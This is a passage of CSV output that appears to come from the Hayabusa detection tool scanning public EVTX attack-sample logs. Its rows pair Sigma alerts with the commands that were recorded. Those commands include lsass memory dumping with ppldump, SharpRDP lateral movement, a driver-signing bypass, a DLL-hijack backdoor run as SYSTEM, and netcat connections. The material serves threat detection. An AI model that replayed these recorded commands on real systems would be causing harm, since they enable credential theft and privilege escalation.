C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 